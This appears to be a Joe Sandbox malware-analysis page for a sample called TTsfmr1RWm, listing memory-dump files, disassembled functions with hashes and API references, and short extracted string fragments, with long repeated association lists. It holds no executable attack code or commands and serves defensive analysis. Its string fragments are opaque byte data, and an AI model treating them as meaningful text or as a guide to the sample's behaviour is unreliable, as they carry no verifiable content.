Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: 5ed7b0d8ef8762c5523557a02aefbd79ddc17e639a3509fbe873383fe8827f4a
Instruction ID: 06b2cb198a6ddab63dadee18ae0a615a8c8045c37924b36938a2094b83f3864e
Opcode Fuzzy Hash: 5ed7b0d8ef8762c5523557a02aefbd79ddc17e639a3509fbe873383fe8827f4a
Instruction Fuzzy Hash: 84C20CB560C3848AE334CF54C852BDFBAF2FB82304F00892DD5E96B255D7B146499B9B

Function 009546D0 Relevance: 36.0, APIs: 1, Strings: 19, Instructions: 1047COMMON

Download Yara Rule

Strings

%r?p, xrefs: 0095595F
<j:h, xrefs: 00955975
gd, xrefs: 00955E60
|r, xrefs: 009553A8
N~4|, xrefs: 0095593E
r:i8, xrefs: 00955899
+$e, xrefs: 0095442B
uw, xrefs: 00955B57
Xs, xrefs: 00955CD8
ut, xrefs: 00955CE3
=:, xrefs: 009557CE
=?, xrefs: 00955BF1
tj, xrefs: 009553BE
y{, xrefs: 00955B36
b`, xrefs: 009555F9
13, xrefs: 00955BFC
e>n<, xrefs: 0095588E
n l, xrefs: 0095596A
DD, xrefs: 00955CEE

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: 802f8638a355cc332c986b150d1e370e2db3b5a92c515feb4edaf0ebe31a02df
Instruction ID: 47b8e5ed796ddb00412702feee56503c5c234ba91be74106a615f1a49c3e911e
Opcode Fuzzy Hash: 802f8638a355cc332c986b150d1e370e2db3b5a92c515feb4edaf0ebe31a02df
Instruction Fuzzy Hash: F5C20BB560C3848AD334CF54C852BDFBAF2FB82300F00892DD5E96B255DBB546499B9B

Function 00941D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00941EC3

Strings

p, xrefs: 00942095
y, xrefs: 00941EF2
L, xrefs: 00941D8F
^, xrefs: 00942034
?, xrefs: 00941EE2
|, xrefs: 00942267
a, xrefs: 009421E6
[, xrefs: 009421EB
8, xrefs: 00941EEA

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 8$?$L$[$^$a$p$y$|
API String ID: 237503144-3949209405
Opcode ID: dcd73c285cf6077fc1cccc60ecbdf8c22f8eb9a92e7b4ce8aed610d17daf688f
Instruction ID: ffeda7c6ed444e64d65f14d8a62177786fd37d33d638426bde1d15b8299af2f9
Opcode Fuzzy Hash: dcd73c285cf6077fc1cccc60ecbdf8c22f8eb9a92e7b4ce8aed610d17daf688f
Instruction Fuzzy Hash: 49129E7160C7808BC324DF38C4917AEBBE1AFC9324F184E2EE4D987392D63899459B53

Function 009460E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON

Download Yara Rule

Strings

*,-", xrefs: 009466EF
{zdy, xrefs: 0094611D
pt}w, xrefs: 009461F2
~mfQ, xrefs: 0094613E
3F&D, xrefs: 00946273
qRb`, xrefs: 00946133
L4, xrefs: 00946780
t~v:, xrefs: 009461E7
w}MI, xrefs: 00946128
uqrs, xrefs: 00946AF0
JyTK, xrefs: 00946160
L4, xrefs: 00946BA0
ntxE, xrefs: 00946112

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
API String ID: 0-2746398225
Opcode ID: 1da642cd0abe8d3ce1ce7d8a54c9fd3119526122e6942db9e93b5f82c0d88d15
Instruction ID: a99e190b652cd0f445a0f1126487da118c7f62819c23af42929d8252753e6983
Opcode Fuzzy Hash: 1da642cd0abe8d3ce1ce7d8a54c9fd3119526122e6942db9e93b5f82c0d88d15
Instruction Fuzzy Hash: CC4222B26083508FC7248F28D891BABB7E6FBD6314F19893CD4D98B256D7349845CB43

Function 0093F60D Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 845COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 0093FDFC

Strings

x, xrefs: 0093FBD4
g, xrefs: 0093F9EA
6, xrefs: 0093F620
\, xrefs: 0093FB0F
w, xrefs: 0093FAAD
#, xrefs: 0093F721
m, xrefs: 0093F8F4
=, xrefs: 0093F978

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #$6$=$\$g$m$w$x
API String ID: 237503144-139252074
Opcode ID: be85e0eac5339a084520d9e7434cae8e071c89d40694e38a4a18e1ae7fc4f0bb
Instruction ID: eda5f011ff9eb90ccb663c7974b5fc58cb838287f43cd3dbef18f5cdf0f3759b
Opcode Fuzzy Hash: be85e0eac5339a084520d9e7434cae8e071c89d40694e38a4a18e1ae7fc4f0bb
Instruction Fuzzy Hash: 62729472A1D7908BD324DB38C85539FBAD2ABD5324F198B3DE4E9C73D1D67889018B42

Function 00957740 Relevance: 16.6, Strings: 13, Instructions: 338COMMON

Download Yara Rule

Strings

P-X/, xrefs: 00957F99
s1z3, xrefs: 00957F4C
O=q?, xrefs: 00957F6D
DE, xrefs: 00957FDB
!A/C, xrefs: 00957FD0
Z)o+, xrefs: 00957F8E
}5x7, xrefs: 00957F57
r, xrefs: 0095831A
1Q>S, xrefs: 00957FA4
$Y)[, xrefs: 00957FBA
f!V#, xrefs: 00957F78
S%g', xrefs: 00957F83
}9F;, xrefs: 00957F62

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: !A/C$$Y)[$1Q>S$DE$O=q?$P-X/$S%g'$Z)o+$f!V#$r$s1z3$}5x7$}9F;
API String ID: 0-3413813421
Opcode ID: c00d152cfb1bf7caecdc71c6405a0790a909d35943be78e4c35929a9124a6242
Instruction ID: 76c002c2d87e4205febf34e409bc0822baa97e8c9b3d9b7a2a5856a2bc85b33f
Opcode Fuzzy Hash: c00d152cfb1bf7caecdc71c6405a0790a909d35943be78e4c35929a9124a6242
Instruction Fuzzy Hash: BFC1EDB160C3408FD724DF69D851B6BBBF1FF81314F04496CE5998B2A2E7348949CB96

Function 0094C8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON

Download Yara Rule

Strings

wt, xrefs: 0094CB3E
\701, xrefs: 0094CF0C, 0094CF03
"nl, xrefs: 0094CC10
#M%O, xrefs: 0094C9FA
a`|v, xrefs: 0094C8A1
AC, xrefs: 0094CCF8
uvw, xrefs: 0094CA0A
pv, xrefs: 0094CB36
MO, xrefs: 0094CD10
4UW, xrefs: 0094CCE0
\701, xrefs: 0094CF55
*", xrefs: 0094CE7A

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
